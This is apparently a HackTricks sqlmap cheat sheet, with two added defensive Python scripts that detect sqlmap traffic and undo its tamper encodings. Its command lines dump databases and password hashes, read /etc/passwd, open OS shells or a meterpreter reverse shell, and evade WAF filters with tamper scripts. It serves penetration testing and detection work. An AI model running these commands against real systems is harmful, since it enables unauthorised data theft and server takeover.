HackTricks
SQLMap - Cheatsheet
Support HackTricks and get benefits!

Basic arguments for SQLmap

Generic

```bash
-u "<URL>"
-p "<PARAM TO TEST>"
--user-agent=SQLMAP
--random-agent
--threads=10
--risk=3 #MAX
--level=5 #MAX
--dbms="<KNOWN DB TECH>"
--os="<OS>"
--technique="UB" #Use only the techniques UNION and BLIND, in that order (default "BEUSTQ")
--batch #Non-interactive mode: sqlmap usually asks questions, this accepts the default answers
--auth-type="<AUTH>" #HTTP authentication type (Basic, Digest, NTLM or PKI)
--auth-cred="<AUTH>" #HTTP authentication credentials (name:password)
--proxy=http://127.0.0.1:8080
--union-char "GsFRts2" #Help sqlmap identify UNION SQLi with an unusual union char
```
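Added defensive example (not code from the HackTricks page or from sqlmap): a small log triage script that maps request payloads in constructed access-log lines to the technique letters `--technique` uses (B boolean-based blind, E error-based, U UNION query, S stacked queries, T time-based blind, Q inline queries) and flags User-Agents that still name sqlmap, which `--random-agent` and `--user-agent` are there to change. The log lines and regexes are assumptions for illustration, not a complete signature set.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (not from the page): one request per sqlmap technique
# letter in the default --technique order "BEUSTQ", followed by a benign request.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:10:00:01 +0000] "GET /?id=1%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
203.0.113.7 - - [10/Mar/2024:10:00:02 +0000] "GET /?id=1%20AND%20EXTRACTVALUE(1%2CCONCAT(0x7e%2Cversion())) HTTP/1.1" 500 88 "-" "SQLMAP"
203.0.113.7 - - [10/Mar/2024:10:00:03 +0000] "GET /?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL-- HTTP/1.1" 200 640 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:10:00:04 +0000] "GET /?id=1%3BSELECT%20SLEEP(5) HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:10:00:05 +0000] "GET /?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:10:00:06 +0000] "GET /?id=(SELECT%20(CASE%20WHEN%20(1%3D1)%20THEN%201%20ELSE%20(SELECT%202%20UNION%20SELECT%203)%20END)) HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Mar/2024:10:00:07 +0000] "GET /?id=42 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Combined log format: we only need client IP, request path and User-Agent.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" '
                    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"')

# Heuristic signatures, most specific first: an inline query (Q) also contains a
# UNION, and a stacked query (S) may also contain SLEEP(), so order decides.
TECHNIQUE_SIGNATURES = [
    ("Q", re.compile(r"\(SELECT\s*\(CASE\s+WHEN", re.I)),                  # inline query
    ("U", re.compile(r"\bUNION\b.{0,20}\bSELECT\b", re.I)),                 # UNION query
    ("S", re.compile(r";\s*(SELECT|INSERT|UPDATE|DELETE|EXEC)\b", re.I)),  # stacked
    ("T", re.compile(r"\b(SLEEP|BENCHMARK|PG_SLEEP)\s*\(|WAITFOR\s+DELAY", re.I)),  # time
    ("E", re.compile(r"\b(EXTRACTVALUE|UPDATEXML)\s*\(", re.I)),            # error-based
    ("B", re.compile(r"\b(AND|OR)\s+\d+\s*=\s*\d+", re.I)),                 # boolean blind
]

def classify(path):
    """Return the sqlmap technique letter a request path most resembles, or None."""
    decoded = unquote_plus(path)
    for letter, pattern in TECHNIQUE_SIGNATURES:
        if pattern.search(decoded):
            return letter
    return None

def scan_log(text):
    """Return (ip, technique, default_ua) per suspicious line; default_ua is True when
    the User-Agent still names sqlmap (its default, or the --user-agent=SQLMAP above)."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        technique = classify(m["path"])
        default_ua = m["ua"].lower().startswith("sqlmap")
        if technique or default_ua:
            hits.append((m["ip"], technique, default_ua))
    return hits
```

A request that matches no signature but carries the default User-Agent is still reported, and the benign last line is not.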

Retrieve Information

Internal

```bash
--current-user #Get current user
--is-dba #Check if the current user is DBA (admin)
--hostname #Get hostname
--users #Get usernames of the DB
--passwords #Get passwords (hashes) of the DB users
--privileges #Get privileges
```

DB data

```bash
--all #Retrieve everything
--dump #Dump DBMS database table entries
--dbs #Names of the available databases
--tables #Tables of a database ( -D <DB NAME> )
--columns #Columns of a table ( -D <DB NAME> -T <TABLE NAME> )
-D <DB NAME> -T <TABLE NAME> -C <COLUMN NAME> #Dump column
```

Injection place

From Burp/ZAP capture

Capture the request (for example from Burp or ZAP) and save it as a req.txt file:

```bash
sqlmap -r req.txt --current-user
```

GET Request Injection

```bash
sqlmap -u "http://example.com/?id=1" -p id
sqlmap -u "http://example.com/?id=*" -p id
```

POST Request Injection

```bash
sqlmap -u "http://example.com" --data "username=*&password=*"
```

Injections in Headers and other HTTP Methods

```bash
#Inside cookie
sqlmap -u "http://example.com" --cookie "mycookies=*"

#Inside some header
sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"
sqlmap -u "http://example.com" --headers="referer:*"

#PUT Method
sqlmap --method=PUT -u "http://example.com" --headers="referer:*"

#The injection is located at the '*'
```

Indicate string when injection is successful

```bash
--string="string_showed_when_TRUE"
```

Eval

Sqlmap allows the use of -e or --eval to process each payload with a Python one-liner before sending it. This makes it easy and fast to pre-process payloads in custom ways. In the following example the Flask session cookie is signed (with flask-unsign) using the known secret before each request is sent:

```bash
sqlmap http://1.1.1.1/sqli --eval "from flask_unsign import session as s; session = s.sign({'uid': session}, secret='SecretExfilratedFromTheMachine')" --cookie="session=*" --dump
```

Shell

```bash
#Exec command
python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami

#Simple Shell
python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell

#Dropping a reverse-shell / meterpreter
python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn
```

Read File

```bash
--file-read=/etc/passwd
```

Crawl a website with SQLmap and auto-exploit

```bash
sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3

#--batch = non-interactive mode; sqlmap usually asks questions, this accepts the default answers
#--crawl = how deep to crawl the site
#--forms = parse and test forms
```

Second Order Injection

```bash
python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
sqlmap -r 1.txt --dbms MySQL --second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" --dbs
```

Read this post about how to perform simple and complex second order injections with sqlmap.

Customizing Injection

Set a suffix

```bash
python sqlmap.py -u "http://example.com/?id=1" -p id --suffix="-- "
```

Prefix

```bash
python sqlmap.py -u "http://example.com/?id=1" -p id --prefix="') "
```

Help finding boolean injection

```bash
# --not-string "string" gives sqlmap a string that does NOT appear in TRUE responses (helps find boolean-based blind injection)
sqlmap -r r.txt -p id --not-string ridiculous --batch
```

Tamper

Remember that you can write your own tamper script in Python, and it is very simple. You can find a tamper example in the Second Order Injection page.

```bash
--tamper=name_of_the_tamper
#In Kali you can see all the tampers in /usr/share/sqlmap/tamper
```
| Tamper | Description |
|---|---|
| apostrophemask.py | Replaces the apostrophe character with its UTF-8 full-width counterpart |
| apostrophenullencode.py | Replaces the apostrophe character with its illegal double-unicode counterpart |
| appendnullbyte.py | Appends an encoded NULL byte character at the end of the payload |
| base64encode.py | Base64-encodes all characters in a given payload |
| between.py | Replaces the greater-than operator ('>') with 'NOT BETWEEN 0 AND #' |
| bluecoat.py | Replaces the space character after an SQL statement with a valid random blank character. Afterwards replaces the '=' character with the LIKE operator |
| chardoubleencode.py | Double URL-encodes all characters in a given payload (not processing already encoded ones) |
| commalesslimit.py | Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' |
| commalessmid.py | Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' |
| concat2concatws.py | Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' |
| charencode.py | URL-encodes all characters in a given payload (not processing already encoded ones) |
| charunicodeencode.py | Unicode-URL-encodes non-encoded characters in a given payload (not processing already encoded ones), e.g. "%u0022" |
| charunicodeescape.py | Unicode-URL-encodes non-encoded characters in a given payload (not processing already encoded ones), e.g. "\u0022" |
| equaltolike.py | Replaces all occurrences of the equals operator ('=') with the 'LIKE' operator |
| escapequotes.py | Slash-escapes quotes (' and ") |
| greatest.py | Replaces the greater-than operator ('>') with its 'GREATEST' counterpart |
| halfversionedmorekeywords.py | Adds a versioned MySQL comment before each keyword |
| ifnull2ifisnull.py | Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' |
| modsecurityversioned.py | Wraps the complete query in a versioned comment |
| modsecurityzeroversioned.py | Wraps the complete query in a zero-versioned comment |
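Added example from the defender's side (not code from the page or from sqlmap): a normalizer that reverses the encoding-style tampers in the table above (URL and double-URL encoding, %u and \u escapes, the full-width apostrophe, NUL bytes, odd blank characters, versioned comments, LIKE standing in for =) so that a plain SQLi signature still matches after tampering. The sample tampered payloads and the signature regex are constructed assumptions, not a complete rule set.

```python
import re
from urllib.parse import unquote

FULLWIDTH_APOSTROPHE = "\uff07"  # what apostrophemask.py substitutes for '

def normalize(payload, max_rounds=5):
    """Undo the encoding-style tampers listed above so signatures see plain SQL."""
    text = payload
    # charencode / chardoubleencode: percent-decode until nothing changes
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    # charunicodeencode (%u0027) and charunicodeescape (\u0027) survive unquote()
    text = re.sub(r"(?:%u|\\u)([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), text)
    text = text.replace(FULLWIDTH_APOSTROPHE, "'")   # apostrophemask
    text = text.replace("\x00", "")                  # appendnullbyte / apostrophenullencode
    text = re.sub(r"[\t\n\r\x0b\x0c]+", " ", text)   # bluecoat: random blanks -> space
    text = re.sub(r"/\*!\d*", "", text).replace("*/", "")  # *versioned comment tampers
    return re.sub(r"\bLIKE\b", "=", text, flags=re.I)      # equaltolike

# Constructed signature: a UNION ... SELECT or a tautology comparison (not exhaustive)
SQLI_SIGNATURE = re.compile(
    r"\bUNION\b.{0,10}\bSELECT\b|\b(?:OR|AND)\s+(?:\d+|'[^']*')\s*=\s*(?:\d+|'[^']*')", re.I)

def matches_raw(payload):
    return bool(SQLI_SIGNATURE.search(payload))

def matches_normalized(payload):
    return bool(SQLI_SIGNATURE.search(normalize(payload)))

# Constructed payloads, each as one tamper from the table would emit it (not page data)
TAMPERED_SAMPLES = {
    "apostrophemask+charencode": "%EF%BC%87%20OR%201%3D1--%20",
    "chardoubleencode": "1%2527%2520OR%25201%253D1",
    "charunicodeencode": "%u0027%20OR%201%3D1",
    "versioned comments": "1 /*!50000UNION*/ /*!50000ALL*/ /*!50000SELECT*/ NULL",
    "equaltolike": "1' OR 'a' LIKE 'a'--",
}

def report(samples=TAMPERED_SAMPLES):
    """Map sample name -> (matched raw, matched after normalize)."""
    return {name: (matches_raw(p), matches_normalized(p)) for name, p in samples.items()}
```

Every sample misses the signature raw and hits it after normalization, which is the point: match on the decoded form, and bound the decode loop so a nested-encoding payload cannot make the normalizer spin.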